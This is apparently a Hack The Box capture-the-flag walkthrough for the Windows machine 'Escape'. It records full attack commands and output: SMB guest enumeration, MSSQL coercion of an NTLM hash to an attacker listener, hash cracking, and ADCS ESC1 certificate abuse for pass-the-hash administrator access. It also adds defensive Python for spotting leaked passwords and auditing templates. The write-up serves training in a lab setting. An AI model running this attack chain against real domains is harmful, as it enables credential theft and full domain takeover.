Introduction
Escape is a medium-difficulty Windows machine on Hack The Box that revolves around Active Directory. The initial foothold is gained by finding credentials in a PDF file on an open SMB share. This access is then leveraged to connect to an MSSQL service, from which we capture and crack the NTLM hash of a service account. Lateral movement is achieved by discovering another user’s credentials in a log file. Finally, privilege escalation to Administrator is accomplished by exploiting a misconfiguration in Active Directory Certificate Services (ADCS), specifically the ESC1 vulnerability.
Scanning and Enumeration
Nmap Scan
We start with a basic Nmap scan to identify open ports and services running on the target machine.
sudo nmap -n -v -Pn -sC -sV -oN nmap.txt 10.10.11.202
# Nmap 7.95 scan initiated Wed Jul 2 10:21:36 2025 as: /usr/lib/nmap/nmap -n -v -Pn -sC -sV -oN nmap.txt 10.10.11.202
Nmap scan report for 10.10.11.202
Host is up (0.13s latency).
Not shown: 987 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-07-02 21:59:14Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Jul 2 10:23:22 2025 -- 1 IP address (1 host up) scanned in 105.64 seconds
We get the following information from the scan:
- Open Ports: 53, 88, 135, 139, 389, 445, 464, 593, 636, 1433, 3268, 3269, and 5985.
- Services: DNS, Kerberos, MSRPC, NetBIOS, LDAP, MSSQL, and HTTPAPI.
- Operating System: Microsoft Windows Server 2019.
- Active Directory: Domain sequel.htb and DC dc.sequel.htb.
We now add the target to our /etc/hosts file for easier access:
10.10.11.202 dc.sequel.htb sequel.htb
Foothold
Looking at the Nmap scan, we can confirm that this is a Windows machine with Active Directory services running.
SMB Enumeration
We have no credentials yet, so we start by enumerating the SMB service with a guest (null-password) session.
kali@kali:~/boxes/Escape.htb$ nxc smb 10.10.11.202 -u 'a' -p ''
SMB 10.10.11.202 445 DC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:sequel.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.202 445 DC [+] sequel.htb\a: (Guest)
We can see that we have access to the sequel.htb domain with guest credentials.
Enumerating users using nxc's rid-brute module:
We find the following users and groups:
- 1000: sequel\DC$ (SidTypeUser)
- 1101: sequel\DnsAdmins (SidTypeAlias)
- 1102: sequel\DnsUpdateProxy (SidTypeGroup)
- 1103: sequel\Tom.Henn (SidTypeUser)
- 1104: sequel\Brandon.Brown (SidTypeUser)
- 1105: sequel\Ryan.Cooper (SidTypeUser)
- 1106: sequel\sql_svc (SidTypeUser)
- 1107: sequel\James.Roberts (SidTypeUser)
- 1108: sequel\Nicole.Thompson (SidTypeUser)
- 1109: sequel\SQLServer2005SQLBrowserUser$DC (SidTypeAlias)
We can now enumerate the shares available on the target machine.
kali@kali:~/boxes/Escape.htb$ nxc smb 10.10.11.202 -u 'a' -p '' --shares
SMB 10.10.11.202 445 DC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:sequel.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.202 445 DC [+] sequel.htb\a: (Guest)
SMB 10.10.11.202 445 DC [*] Enumerated shares
SMB 10.10.11.202 445 DC Share Permissions Remark
SMB 10.10.11.202 445 DC ----- ----------- ------
SMB 10.10.11.202 445 DC ADMIN$ Remote Admin
SMB 10.10.11.202 445 DC C$ Default share
SMB 10.10.11.202 445 DC IPC$ READ Remote IPC
SMB 10.10.11.202 445 DC NETLOGON Logon server share
SMB 10.10.11.202 445 DC Public READ
SMB 10.10.11.202 445 DC SYSVOL Logon server share
Public Share Enumeration
We can see that we have read access to the Public share. Let's enumerate it further using smbclient to see if we can find any interesting files.
kali@kali:~/boxes/Escape.htb$ smbclient //10.10.11.202/Public -U a%
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat Nov 19 06:51:25 2022
.. D 0 Sat Nov 19 06:51:25 2022
SQL Server Procedures.pdf A 49551 Fri Nov 18 08:39:43 2022
5184255 blocks of size 4096. 1475930 blocks available
smb: \>
We see one interesting file named SQL Server Procedures.pdf. Let's download it to our local machine.
smb: \> get "SQL Server Procedures.pdf"
getting file \SQL Server Procedures.pdf of size 49551 as SQL Server Procedures.pdf (57.1 KiloBytes/sec) (average 57.1 KiloBytes/sec)
We can open the PDF file to see if it contains any useful information. On page 2 we find a set of credentials.
This gives us a username PublicUser and a password Gu██████rCantWrite1.
We can now use these credentials to authenticate to the MSSQL service using nxc.
(Remember, we need to use the --local-auth flag since we are not using domain credentials.)
kali@kali:~/boxes/Escape.htb$ nxc mssql 10.10.11.202 -u PublicUser -p Gu██████rCantWrite1 --local-auth
MSSQL 10.10.11.202 1433 DC [*] Windows 10 / Server 2019 Build 17763 (name:DC) (domain:sequel.htb)
MSSQL 10.10.11.202 1433 DC [+] DC\PublicUser:Gu██████rCantWrite1
We now use responder to capture the NTLM hash of the user which is running the MSSQL service.
kali@kali:~/boxes/Escape.htb$ sudo responder -I tun0
Coercing MSSQL Service to capture NTLM Hash
We can now use nxc to coerce the MSSQL service to authenticate to our responder instance and capture the NTLM hash.
nxc mssql 10.10.11.202 -u PublicUser -p Gu██████rCantWrite1 --local-auth -M mssql_coerce -o LISTENER=10.10.16.31
- -u: Username to authenticate with.
- -p: Password for the user.
- --local-auth: Use local authentication instead of domain authentication.
- -M mssql_coerce: Use the MSSQL coerce module to force the MSSQL service to authenticate to our responder instance.
- -o LISTENER=10.10.16.31: Specify the IP address of our responder instance to listen for NTLM authentication requests.
kali@kali:~/boxes/Escape.htb$ nxc mssql 10.10.11.202 -u PublicUser -p Gu██████rCantWrite1 --local-auth -M mssql_coerce -o LISTENER=10.10.16.31
MSSQL 10.10.11.202 1433 DC [*] Windows 10 / Server 2019 Build 17763 (name:DC) (domain:sequel.htb)
MSSQL 10.10.11.202 1433 DC [+] DC\PublicUser:Gu██████rCantWrite1
MSSQL_CO... 10.10.11.202 1433 DC [*] Commands executed successfully, check the listener for results
On the responder terminal, we should see the NTLM hash being captured:
[+] Listening for events...
[SMB] NTLMv2-SSP Client : 10.10.11.202
[SMB] NTLMv2-SSP Username : sequel\sql_svc
[SMB] NTLMv2-SSP Hash : sql_svc::sequel:1477a8036251ce8d<----SNIP---->
[*] Skipping previously captured hash for sequel\sql_svc
[*] Skipping previously captured hash for sequel\sql_svc
Cracking the NTLM Hash
We can now crack the NTLM hash using hashcat or john.
Running the following on our host machine:
hashcat sql_svc.hash SecLists/Passwords/Leaked-Databases/rockyou.txt
We get the password for the sql_svc user as REGG██████ronnie.
Checking the password against the sql_svc user, we can confirm that it is correct.
kali@kali:~/boxes/Escape.htb$ nxc smb 10.10.11.202 -u 'sql_svc' -p 'REGG██████ronnie'
SMB 10.10.11.202 445 DC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:sequel.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.202 445 DC [+] sequel.htb\sql_svc:REGG██████ronnie
Checking the users in the Remote Management Users group:
kali@kali:~/boxes/Escape.htb$ nxc ldap 10.10.11.202 -u 'sql_svc' -p 'REGG██████ronnie' --groups "Remote Management Users"
LDAP 10.10.11.202 389 DC [*] Windows 10 / Server 2019 Build 17763 (name:DC) (domain:sequel.htb)
LDAPS 10.10.11.202 636 DC [+] sequel.htb\sql_svc:REGG██████ronnie
LDAPS 10.10.11.202 636 DC sql_svc
LDAPS 10.10.11.202 636 DC Ryan.Cooper
We have 2 users: sql_svc and Ryan.Cooper.
Shell as sql_svc
We can now use winrm to connect to the target machine using the sql_svc user.
kali@kali:~/boxes/Escape.htb$ evil-winrm-py -i 10.10.11.202 -u 'sql_svc' -p 'REGG██████ronnie'
[*] Connecting to 10.10.11.202:5985 as sql_svc
evil-winrm-py PS C:\Users\sql_svc\Documents>
There is no user.txt file on sql_svc's Desktop.
Lateral Movement
We are now logged in as the sql_svc user. We can check the privileges of this user using the whoami /priv command.
evil-winrm-py PS C:\Users\sql_svc\Documents> whoami /priv
USER INFORMATION
There is an error log file in the C:\SQLServer\Logs directory. Let's check it out.
evil-winrm-py PS C:\SQLServer\Logs> ls
Directory: C:\SQLServer\Logs
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 2/7/2023 8:06 AM 27608 ERRORLOG.BAK
Downloading the ERRORLOG.BAK file to our local machine:
evil-winrm-py PS C:\SQLServer\Logs> download ERRORLOG.BAK .
Downloading C:\SQLServer\Logs\ERRORLOG.BAK: 64.0kB [00:00, 376MB/s]
[+] File downloaded successfully and saved as: /home/kali/boxes/Escape.htb/ERRORLOG.BAK
Finding Credentials in the Error Log
In the ERRORLOG.BAK file, we find some interesting information, including failed login attempts and the usernames of the users who attempted to log in.
# <----SNIP---->
2022-11-18 13:43:07.44 Logon Error: 18456, Severity: 14, State: 8.
2022-11-18 13:43:07.44 Logon Logon failed for user 'sequel.htb\Ryan.Cooper'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.48 Logon Error: 18456, Severity: 14, State: 8.
2022-11-18 13:43:07.48 Logon Logon failed for user 'NuclearMos██████'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.72 spid51 Attempting to load library 'xpstar.dll' into memory. This is an informational message only. No user action is required.
# <----SNIP---->
We can infer that the Ryan.Cooper user tried to log in, mistakenly pressed the Enter key, and then typed the password NuclearMos██████ into the username field, so it was recorded in the log as a login name.
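The failed-logon pattern above is something a defender can hunt for in SQL Server error logs: a "login name" that is not a Windows account and that fails within a second or two of a real account failing from the same client is very likely a password typed into the wrong field. The Python below is an added example (not part of the original writeup or of any tool it uses): it parses constructed ERRORLOG lines in the layout shown above, flags that pattern, and masks the suspect value so the finding can be reported without repeating the secret. The password-like value and the known SQL login list are made up for the example.

```python
import re
from datetime import datetime, timedelta

# Matches the "Logon failed" line that follows each "Error: 18456" entry.
LOGON_FAIL = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d+)\s+Logon\s+Logon failed for user "
    r"'(?P<user>[^']*)'\. Reason: .*?\s*\[CLIENT: (?P<client>[^\]]+)\]$")

def parse_failed_logons(lines):
    """Return failed-logon events (timestamp, login name, client) in log order."""
    events = []
    for line in lines:
        m = LOGON_FAIL.match(line.strip())
        if m:
            events.append({"ts": datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S.%f"),
                           "user": m["user"], "client": m["client"]})
    return events

def is_account_name(name):
    """Windows logins show up as DOMAIN\\user or user@domain."""
    return "\\" in name or "@" in name

def mask(secret, keep=3):
    """Keep a short prefix so the finding can be reported without the secret."""
    return secret[:keep] + "*" * max(len(secret) - keep, 0)

def find_leaked_secrets(events, known_logins=frozenset(), window=timedelta(seconds=2)):
    """Flag a failure whose login name is probably a password: it is neither a Windows
    account nor a known SQL login, and it is preceded within `window` by a failure for
    a real account from the same client (the typo pattern seen in ERRORLOG.BAK)."""
    hits = []
    for i, ev in enumerate(events):
        if is_account_name(ev["user"]) or ev["user"] in known_logins:
            continue
        for prev in reversed(events[:i]):  # events are chronological
            if ev["ts"] - prev["ts"] > window:
                break
            if prev["client"] == ev["client"] and is_account_name(prev["user"]):
                hits.append({"account": prev["user"], "client": ev["client"],
                             "suspect_masked": mask(ev["user"])})
                break
    return hits

# Constructed sample in the ERRORLOG layout; the password-like value is made up.
SAMPLE_LOG = r"""
2022-11-18 13:43:07.44 Logon       Error: 18456, Severity: 14, State: 8.
2022-11-18 13:43:07.44 Logon       Logon failed for user 'sequel.htb\Ryan.Cooper'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.48 Logon       Error: 18456, Severity: 14, State: 8.
2022-11-18 13:43:07.48 Logon       Logon failed for user 'NotARealPassw0rd!'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:08.10 Logon       Error: 18456, Severity: 14, State: 8.
2022-11-18 13:43:08.10 Logon       Logon failed for user 'PublicUser'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.72 spid51      Attempting to load library 'xpstar.dll' into memory. This is an informational message only. No user action is required.
""".strip().splitlines()
```

Without the known-login list the legitimate SQL login PublicUser would also be flagged, which is why the check takes the server's real SQL logins as input; a hit means the named account's password should be rotated and the log scrubbed.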
Trying to log in as the Ryan.Cooper user with the password NuclearMos██████:
kali@kali:~/boxes/Escape.htb$ nxc smb 10.10.11.202 -u 'Ryan.Cooper' -p 'NuclearMos██████'
SMB 10.10.11.202 445 DC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:sequel.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.202 445 DC [+] sequel.htb\Ryan.Cooper:NuclearMos██████
We can see that we have successfully authenticated as the Ryan.Cooper user.
Now, using winrm, we can get a shell.
evil-winrm-py -i 10.10.11.202 -u ryan.cooper -p NuclearMos██████
Get user.txt:
evil-winrm-py PS C:\Users\Ryan.Cooper\Desktop> cat user.txt
0c8cd01d32ba██████ba42d9410922d8
Privilege Escalation
Checking with nxc's enum_ca module, ADCS is found to be running.
kali@kali:~/boxes/Escape.htb$ nxc smb 10.10.11.202 -u 'Ryan.Cooper' -p 'NuclearMos██████' -M enum_ca
SMB 10.10.11.202 445 DC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:sequel.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.202 445 DC [+] sequel.htb\Ryan.Cooper:NuclearMos██████
ENUM_CA 10.10.11.202 445 DC Active Directory Certificate Services Found.
ENUM_CA 10.10.11.202 445 DC http://10.10.11.202/certsrv/certfnsh.asp
Enumerating ADCS Misconfigurations using certipy
We now enumerate misconfigurations in ADCS using certipy.
kali@kali:~/boxes/Escape.htb$ certipy find -u 'Ryan.Cooper' -p 'NuclearMos██████' -dc-ip 10.10.11.202 -stdout -vulnerable
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Finding issuance policies
[*] Found 15 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'sequel-DC-CA' via RRP
[*] Successfully retrieved CA configuration for 'sequel-DC-CA'
[*] Checking web enrollment for CA 'sequel-DC-CA' @ 'dc.sequel.htb'
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[*] Enumeration output:
Certificate Authorities
0
CA Name : sequel-DC-CA
DNS Name : dc.sequel.htb
# <----SNIP---->
Certificate Templates
0
Template Name : UserAuthentication
Display Name : UserAuthentication
Certificate Authorities : sequel-DC-CA
Enabled : True
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : True
Certificate Name Flag : EnrolleeSuppliesSubject
Enrollment Flag : IncludeSymmetricAlgorithms
PublishToDs
Private Key Flag : ExportableKey
Extended Key Usage : Client Authentication
Secure Email
Encrypting File System
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Schema Version : 2
Validity Period : 10 years
Renewal Period : 6 weeks
Minimum RSA Key Length : 2048
# <----SNIP---->
[+] User Enrollable Principals : SEQUEL.HTB\Domain Users
[!] Vulnerabilities
ESC1 : Enrollee supplies subject and template allows client authentication.
What is ESC1?
The vulnerability arises when a certificate template is inadequately secured, permitting a low-privileged user to request a certificate and, importantly, specify an arbitrary identity within the certificate's SAN. This allows the attacker to impersonate any user, including administrators. [1]
Key indicators in the output:
- [!] Vulnerabilities ESC1 : Enrollee supplies subject and template allows client authentication. => This explicitly flags the vulnerability.
- Enrollee Supplies Subject : True => This confirms the setting allowing attacker-defined subjects.
- Client Authentication : True => This confirms the certificate can be used for logon.
- [+] User Enrollable Principals : SEQUEL.HTB\Domain Users => This confirms the attacker has the necessary rights to request a certificate from this template.
- Requires Manager Approval : False and Authorized Signatures Required : 0 => These confirm the absence of preventative issuance controls.
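The indicators above are a checklist that can be applied to every template in a forest, not just the one certipy flagged. The Python below is an added example (not part of the original writeup and not certipy's own data model): it encodes the ESC1 preconditions as a function over template records, then audits three constructed records, the UserAuthentication template with the values reported above plus two hardened variants I made up, and reports which single control blocks the finding on each. The field names are assumptions chosen for this example.

```python
# Groups whose enrollment rights make a template reachable by any domain user.
LOW_PRIV_PRINCIPALS = {"domain users", "authenticated users", "everyone", "domain computers"}
# EKUs that let the issued certificate be used for Kerberos (PKINIT) logon.
AUTH_EKUS = {"client authentication", "pkinit client authentication",
             "smart card logon", "any purpose"}

def esc1_conditions(tpl):
    """Evaluate each ESC1 precondition for one template record.
    Returns {condition: bool}; the template is ESC1 only if every value is True."""
    eku = {e.lower() for e in tpl.get("extended_key_usage", [])}
    enrollers = {p.split("\\", 1)[-1].lower() for p in tpl.get("enrollment_rights", [])}
    return {
        "enabled": bool(tpl.get("enabled")),
        "enrollee_supplies_subject": bool(tpl.get("enrollee_supplies_subject")),
        "allows_client_auth": bool(tpl.get("client_authentication")) or not eku.isdisjoint(AUTH_EKUS),
        "no_manager_approval": not tpl.get("requires_manager_approval", True),
        "no_signatures_required": tpl.get("authorized_signatures_required", 1) == 0,
        "low_priv_enrollable": not enrollers.isdisjoint(LOW_PRIV_PRINCIPALS),
    }

def is_esc1(tpl):
    return all(esc1_conditions(tpl).values())

def audit(templates):
    """For each template, say whether it is ESC1 and, if not, which controls block it."""
    report = []
    for tpl in templates:
        conds = esc1_conditions(tpl)
        report.append({"template": tpl["name"], "esc1": all(conds.values()),
                       "blocked_by": [name for name, ok in conds.items() if not ok]})
    return report

# Constructed records: the first mirrors certipy's output for UserAuthentication,
# the other two are hypothetical hardened variants.
USER_AUTH = {
    "name": "UserAuthentication", "enabled": True, "client_authentication": True,
    "enrollee_supplies_subject": True,
    "extended_key_usage": ["Client Authentication", "Secure Email", "Encrypting File System"],
    "requires_manager_approval": False, "authorized_signatures_required": 0,
    "enrollment_rights": ["SEQUEL.HTB\\Domain Users"],
}
TEMPLATES = [
    USER_AUTH,
    # Same template, but CA manager approval is required before issuance.
    {**USER_AUTH, "name": "UserAuthentication-Hardened", "requires_manager_approval": True},
    # Same enrollment model, but the EKU cannot be used for logon.
    {**USER_AUTH, "name": "WebServerOnly", "client_authentication": False,
     "extended_key_usage": ["Server Authentication"]},
]
```

Clearing Enrollee Supplies Subject is the usual fix for a template meant for ordinary users; manager approval or a tighter enrollment ACL is the fallback when the subject genuinely must be caller-supplied.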
We request a certificate from the vulnerable template, supplying the identity of a privileged target (the administrator UPN) as the subject:
certipy req \
-u 'Ryan.Cooper' -p 'NuclearMos██████' \
-dc-ip '10.10.11.202' -target 'dc.sequel.htb' \
-ca 'sequel-DC-CA' -template 'UserAuthentication' \
-upn 'administrator@sequel.htb'
- -u: Username to authenticate with.
- -p: Password for the user.
- -dc-ip: IP address of the Domain Controller.
- -target: Target domain controller.
- -ca: Name of the certificate authority.
- -template: Name of the certificate template to use.
- -upn: User Principal Name (UPN) to inject into the certificate request.
Running the command, we get:
kali@kali:~/boxes/Escape.htb$ certipy req \
-u 'Ryan.Cooper' -p 'NuclearMos██████' \
-dc-ip '10.10.11.202' -target 'dc.sequel.htb' \
-ca 'sequel-DC-CA' -template 'UserAuthentication' \
-upn 'administrator@sequel.htb'
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Request ID is 13
[*] Successfully requested certificate
[*] Got certificate with UPN 'administrator@sequel.htb'
[*] Certificate has no object SID
[*] Try using -sid to set the object SID or see the wiki for more details
[*] Saving certificate and private key to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'
The certificate is saved as administrator.pfx, which contains both the certificate and the private key.
We then use the obtained certificate to authenticate as the target:
certipy auth -pfx administrator.pfx -dc-ip 10.10.11.202
- -pfx: Path to the PFX file containing the certificate and private key.
- -dc-ip: IP address of the Domain Controller.
We try to authenticate using the certificate we just requested, but we encounter a clock skew error. This is likely because the time on our machine is not synchronized with the target: Kerberos rejects requests whose timestamp differs from the DC's clock by more than the allowed skew.
kali@kali:~/boxes/Escape.htb$ certipy auth -pfx administrator.pfx -dc-ip 10.10.11.202
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN UPN: 'administrator@sequel.htb'
[*] Using principal: 'administrator@sequel.htb'
[*] Trying to get TGT...
[-] Got error while trying to request TGT: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
[-] Use -debug to print a stacktrace
[-] See the wiki for more information
We fix this by syncing our clock with the target:
sudo rdate -n 10.10.11.202
We can now re-attempt to authenticate using the administrator.pfx certificate we obtained earlier.
kali@kali:~/boxes/Escape.htb$ certipy auth -pfx 'administrator.pfx' -dc-ip '10.10.11.202'
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN UPN: 'administrator@sequel.htb'
[*] Using principal: 'administrator@sequel.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@sequel.htb': aad3b435b51404eeaad3b435b51404ee:a52f██████51e5f5e17e1e9f3e58f4ee
certipy successfully authenticated as the administrator user and retrieved the NT hash.
Using the NT hash, we can now connect to the target machine using winrm.
kali@kali:~/boxes/Escape.htb$ evil-winrm-py -i 10.10.11.202 -u administrator -H a52f██████51e5f5e17e1e9f3e58f4ee
[*] Connecting to 10.10.11.202:5985 as administrator
evil-winrm-py PS C:\Users\Administrator\Documents>
We can now get the root flag:
evil-winrm-py PS C:\Users\Administrator\Desktop> cat root.txt
12bc39fe2fcfe7326██████1a3e0d208